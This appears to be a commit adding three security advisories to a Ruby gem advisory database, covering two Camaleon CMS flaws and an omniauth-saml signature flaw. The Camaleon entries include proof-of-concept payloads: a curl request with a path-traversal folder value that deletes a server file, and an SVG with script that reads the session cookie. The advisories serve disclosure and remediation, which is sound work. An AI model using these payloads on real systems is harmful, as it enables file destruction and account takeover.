GHSA SYNC: 3 brand new advisories

Author: jasnow

gems/camaleon_cms/GHSA-7x4w-cj9r-h4v9.yml

@@ -0,0 +1,81 @@
+---
+gem: camaleon_cms
+ghsa: 7x4w-cj9r-h4v9
+url: https://github.com/owen2345/camaleon-cms/security/advisories/GHSA-7x4w-cj9r-h4v9
+title: Camaleon CMS vulnerable to remote code execution through code injection (GHSL-2024-185)
+date: 2024-09-18
+description: |
+  The [actions](https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/controllers/camaleon_cms/admin/media_controller.rb#L51-L52)
+  defined inside of the MediaController class do not check whether a
+  given path is inside a certain path (e.g. inside the media folder).
+  If an attacker performed an account takeover of an administrator
+  account (See: GHSL-2024-184) they could delete arbitrary files or
+  folders on the server hosting Camaleon CMS. The
+  [crop_url](https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/controllers/camaleon_cms/admin/media_controller.rb#L64-L65)
+  action might make arbitrary file writes (similar impact to GHSL-2024-182)
+  for any authenticated user possible, but it doesn't seem to work currently.
+
+  Arbitrary file deletion can be exploited with following code path:
+  The parameter folder flows from the actions method:
+  ```ruby
+    def actions
+      authorize! :manage, :media if params[:media_action] != 'crop_url'
+      params[:folder] = params[:folder].gsub('//', '/') if params[:folder].present?
+      case params[:media_action]
+      [..]
+      when 'del_file'
+        cama_uploader.delete_file(params[:folder].gsub('//', '/'))
+        render plain: ''
+  ```
+  into the method delete_file of the CamaleonCmsLocalUploader
+  class (when files are uploaded locally):
+  ```ruby
+  def delete_file(key)
+    file = File.join(@root_folder, key)
+    FileUtils.rm(file) if File.exist? file
+    @instance.hooks_run('after_delete', key)
+    get_media_collection.find_by_key(key).take.destroy
+  end
+  ```
+  Where it is joined in an unchecked manner with the root folder and
+  then deleted.
+
+  **Proof of concept**
+  The following request would delete the file README.md in the top
+  folder of the Ruby on Rails application. (The values for auth_token,
+  X-CSRF-Token and _cms_session would also need to be replaced with
+  authenticated values in the curl command below)
+  ```
+  curl --path-as-is -i -s -k -X $'POST' \
+      -H $'X-CSRF-Token: [..]' -H $'User-Agent: Mozilla/5.0' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Accept: */*' -H $'Connection: keep-alive' \
+      -b $'auth_token=[..]; _cms_session=[..]' \
+      --data-binary $'versions=&thumb_size=&formats=&media_formats=&dimension=&private=&folder=..
+  2F..
+  2F..
+  2FREADME.md&media_action=del_file' \
+      $'https://<camaleon-host>/admin/media/actions?actions=true'
+  ```
+
+  **Impact**
+
+  This issue may lead to a defective CMS or system.
+
+  **Remediation**
+
+  Normalize all file paths constructed from untrusted user input
+  before using them and check that the resulting path is inside the
+  targeted directory. Additionally, do not allow character sequences
+  such as .. in untrusted input that is used to build paths.
+
+  **See also:**
+
+  [CodeQL: Uncontrolled data used in path expression](https://codeql.github.com/codeql-query-help/ruby/rb-path-injection/)
+  [OWASP: Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal)
+cvss_v3: 7.2
+patched_versions:
+  - ">= 2.8.1"
+related:
+  url:
+    - https://github.com/owen2345/camaleon-cms/security/advisories/GHSA-7x4w-cj9r-h4v9
+    - https://github.com/owen2345/camaleon-cms/commit/f5d032549fa0a204d06e738caf2663607967dee2
+    - https://github.com/advisories/GHSA-7x4w-cj9r-h4v9

gems/camaleon_cms/GHSA-r9cr-qmfw-pmrc.yml

@@ -0,0 +1,88 @@
+---
+gem: camaleon_cms
+ghsa: r9cr-qmfw-pmrc
+url: https://github.com/owen2345/camaleon-cms/security/advisories/GHSA-r9cr-qmfw-pmrc
+title: Camaleon CMS vulnerable to stored XSS through user file upload (GHSL-2024-184)
+date: 2024-09-18
+description: |
+  A stored cross-site scripting has been found in the image upload
+  functionality that can be used by normal registered users:
+  It is possible to upload a SVG image containing JavaScript and
+  it's also possible to upload a HTML document when the format
+   parameter is manually changed to
+  [documents](https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/uploaders/camaleon_cms_uploader.rb#L105-L106)
+  or a string of an
+  [unsupported format](https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/uploaders/camaleon_cms_uploader.rb#L110-L111).
+  If an authenticated user or administrator visits that uploaded
+  image or document malicious JavaScript can be executed on their
+  behalf (e.g. changing or deleting content inside of the CMS.)
+
+  ** Proof of concept **
+
+  Login as a normal user (if user signup is enabled).
+  Go to the user's profile.
+  And upload the following profile picture via drag and drop.
+  The content of the SVG file could be as follows (e.g. name it test-xss.svg):
+
+  <?xml version="1.0" encoding="UTF-8" standalone="no"?>
+  <svg
+     xmlns:dc="http://purl.org/dc/elements/1.1/"
+     xmlns:cc="http://creativecommons.org/ns#"
+     xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
+     xmlns:svg="http://www.w3.org/2000/svg"
+     xmlns="http://www.w3.org/2000/svg"
+     width="500"
+     height="500"
+     viewBox="0 0 198.4375 52.916666"
+     version="1.1">
+    <g
+       transform="translate(-9.8676114,4.8833333)">
+      <path
+         d="m 107.79557,-10.430538 -7.33315,-0.02213 -3.647402,-6.361755 3.685742,-6.339624 7.33314,0.02213 3.64741,6.361756 z"
+         style="fill:#131f6b;fill-opacity:1;stroke-width:0.05937638"
+         transform="scale(1,-1)" />
+    <!-- The below lines were added in a text editor to the image XML. This is the stored XSS attack. -->
+    <script type="text/javascript">
+      alert("This is an example of a stored XSS attack in an SVG image, here's the cookie: " + document.cookie);
+    </script>
+    </g>
+  </svg>
+
+  The server might fail with a 500 internal server error, but the
+  uploaded image should be available at a location like
+  https://<camaleon-host>/media/1/test-xss-cookie.svg. If an
+  authenticated user or administrator accesses that link their
+  auth_token is reflected. Since the auth_token cookie contains a
+  static [auth token](https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/models/concerns/camaleon_cms/user_methods.rb#L18-L19)
+  value that only changes when a user changes their password.
+
+  **Impact**
+
+  This issue may lead to account takeover due to reflected
+  Cross-site scripting (XSS).
+
+  **Remediation**
+
+  Only allow the upload of safe files such as PNG, TXT and others
+  or serve all "unsafe" files such as SVG and other files with a
+  content-disposition: attachment header, which should prevent
+  browsers from displaying them.
+
+  Additionally, a [Content security policy (CSP)](https://web.dev/articles/csp)
+  can be created that disallows inlined script. (Other parts of the
+  application might need modification to continue functioning.)
+
+  To prevent the theft of the auth_token it could be marked with
+  HttpOnly. This would however not prevent that actions could be
+  performed as the authenticated user/administrator. Furthermore,
+  it could make sense to use the authentication provided by
+   Ruby on Rails, so that stolen tokens cannot be used anymore
+  after some time.
+cvss_v3: 5.4
+patched_versions:
+  - ">= 2.8.1"
+related:
+  url:
+    - https://github.com/owen2345/camaleon-cms/security/advisories/GHSA-r9cr-qmfw-pmrc
+    - https://github.com/owen2345/camaleon-cms/commit/b18fbc74f3ecd98a1f781d015f5466ef16b1425b
+    - https://github.com/advisories/GHSA-r9cr-qmfw-pmrc

gems/omniauth-saml/GHSA-cvp8-5r8g-fhvq.yml

@@ -0,0 +1,25 @@
+---
+gem: omniauth-saml
+ghsa: cvp8-5r8g-fhvq
+url: https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-jw9c-mfg7-9rx2
+title: omniauth-saml vulnerable to Improper Verification of Cryptographic Signature
+date: 2024-09-11
+description: |
+  ruby-saml, the dependent SAML gem of omniauth-saml has a signature
+  wrapping vulnerability in <= v1.12.0 and v1.13.0 to v1.16.0 , see
+  https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-jw9c-mfg7-9rx2
+
+  As a result, omniauth-saml created a [new release](https://github.com/omniauth/omniauth-saml/releases)
+  by upgrading ruby-saml to the patched versions v1.17.
+cvss_v3: 10.0
+patched_versions:
+  - "~> 1.10.5"
+  - "~> 2.1.2"
+  - ">= 2.2.1"
+related:
+  url:
+    - https://github.com/omniauth/omniauth-saml/commit/4274e9d57e65f2dcaae4aa3b2accf831494f2ddd
+    - https://github.com/omniauth/omniauth-saml/commit/6c681fd082ab3daf271821897a40ab3417382e29
+    - https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-jw9c-mfg7-9rx2
+    - https://github.com/omniauth/omniauth-saml/security/advisories/GHSA-cvp8-5r8g-fhvq
+    - https://github.com/advisories/GHSA-cvp8-5r8g-fhvq